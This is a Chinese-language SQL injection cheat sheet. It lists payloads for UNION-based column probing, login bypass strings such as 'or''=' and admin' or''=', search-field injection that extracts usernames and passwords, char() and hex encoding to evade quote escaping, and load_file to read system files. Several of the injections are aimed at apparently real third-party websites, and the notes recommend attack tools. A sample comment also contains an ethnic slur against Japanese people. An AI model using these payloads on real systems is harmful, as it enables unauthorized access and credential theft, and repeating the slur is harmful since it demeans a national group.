user是SQLServer的一个内置变量
http://www.19cn.com/showdetail.asp?id=49 and user>0

1. 主要思路
	首先尝试是否能正面注入
	否则考虑从旁注来入手

2. 一些常用工具
	asp
	手工注入
	工具
	啊D
	明小子
	pangolin
	http://www.nosec.org/cn
	http://www.cr173.com/soft/4405.html

	http://www.better-cleaning.com/productshow.asp?id=711 and exists (select * from admin)

3. 简单常用登录页面url
	adminlogin.php?adminname=nm&password=bar
	adminlogin.php?adminname=nm&password=baror1=1

4. 常用的测试
	admin/*hacking by Juliet！
	japanese all are dogs*/

	and 1=1 union select 1
	and 1=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

	aabb%' or 1=1 order by id#
	select * from users where username like '%aabb%' or 1=1 order by id# ORDER BY username

	%' order by id#
	'order by id#
	select * from users where username like '% %' order by id# order by username

	?id=1 and select * from users
	?id=1 and 1<>1 union select 1,2,3,4,5,6,7,8,9,10 from users

	http://yym.hzqxl.com/order.php?channel=7779&id=2166&is_survey=0

5. 搜索型注入
	a%' and 1=2 union select 1, username, 3,4,5..., password, 10, 11 from alphaauthor
	select * from alphadb where title like '%a%' and 1=2 union select 1, username, ..., password ... from ....#%'

6. 常见输入
	用户名和密码框中都输入
	'or''='
	select * from alphaauthor where UserName='' or ''='' and Password=''or''=''

	用户名密码
	'or'a'='a

	用户名密码
	'or 1=1 and ''='

	用户名密码
	'or 2>1 and ''='

	用户名 
	'or 1=1 #
	密码随意输入

	用户名
	'or id=1 #
	密码随意输入

	用户名
	admin' or''='
	密码任意

7. 可以实现注入的几个地方
	1.搜索
	2.登录框
	3.前台现实资料

	当magic_quotes_gpc=On时候，变量中的所有' 单引号, ''(双引号), \(反斜线) 和 空格符会自动转换为含有反斜线的转义字符
	这样就使字符串注入的方法化为泡影，这个时候就至鞥年注入数字型而没有见Intval()处理的情况了，假如是字符串型就必须得像下面这个样子，不能在字符上加上引号
	使用 char()
	假设知道用户名为alpha
	转化为ASCII后为char(97, 108, 112, 104, 97)
	转化为16进制是0x616C706861
	http://localhost/site/admin/login.php?username=char(97, 108, 112, 104, 97)
	select * from alphaAuthor where UserName=char(97, 108, 112, 104, 97)# and Password=''
	也可以这样
	http://localhost/site/admin/login.php?username=0x616C706861%23
	结果sql语句变成
	select * from alphaAuthor where UserName=0x616C706861%23# and Password=''

	同时load_file('c:/boot.ini')可以转化为
	load(char(99, 58, .... 105, 110, 105))

	?id=1 and 1=2 union select 1,2,3,4,5,6,7,8

高级PHP应用程序漏洞审核技术
http://67.220.92.8/